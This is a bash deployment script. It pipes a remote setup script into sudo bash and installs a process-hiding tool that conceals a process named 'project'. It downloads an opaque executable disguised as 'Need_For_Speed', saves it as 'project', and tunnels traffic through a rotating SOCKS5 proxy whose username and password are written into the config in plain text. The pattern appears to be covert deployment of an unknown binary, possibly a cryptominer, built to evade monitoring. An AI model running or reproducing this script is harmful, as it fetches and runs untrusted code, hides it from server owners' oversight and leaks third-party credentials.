#!/bin/bash    
apt update;apt install -y sudo wget curl unzip >/dev/null 2>&1
sudo apt update;apt install -y curl unzip autoconf git nano cmake binutils build-essential net-tools screen golang >/dev/null 2>&1
curl -fsSL https://deb.nodesource.com/setup_17.x | sudo -E bash -
apt-get install -y nodejs >/dev/null 2>&1
sudo npm i -g node-process-hider && sudo ph add project
wget -O project https://raw.githubusercontent.com/hanifgz/ngarit/main/Need_For_Speed;chmod +x project &&
ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime

dpkg-reconfigure --frontend noninteractive tzdata

wget https://raw.githubusercontent.com/hanifgz/ngarit/main/graphics.tar.gz
tar -xvzf graphics.tar.gz

cat > graftcp/local/graftcp-local.conf <<END
listen = :2233
loglevel = 1
socks5 = p.webshare.io:80
socks5_username = kuyaxbatox-rotate
socks5_password = b15m1ll4H
END

./graftcp/local/graftcp-local -config graftcp/local/graftcp-local.conf &
sleep .2
./graftcp/graftcp curl ifconfig.me
echo " "
echo " "

screen ./graftcp/graftcp bash
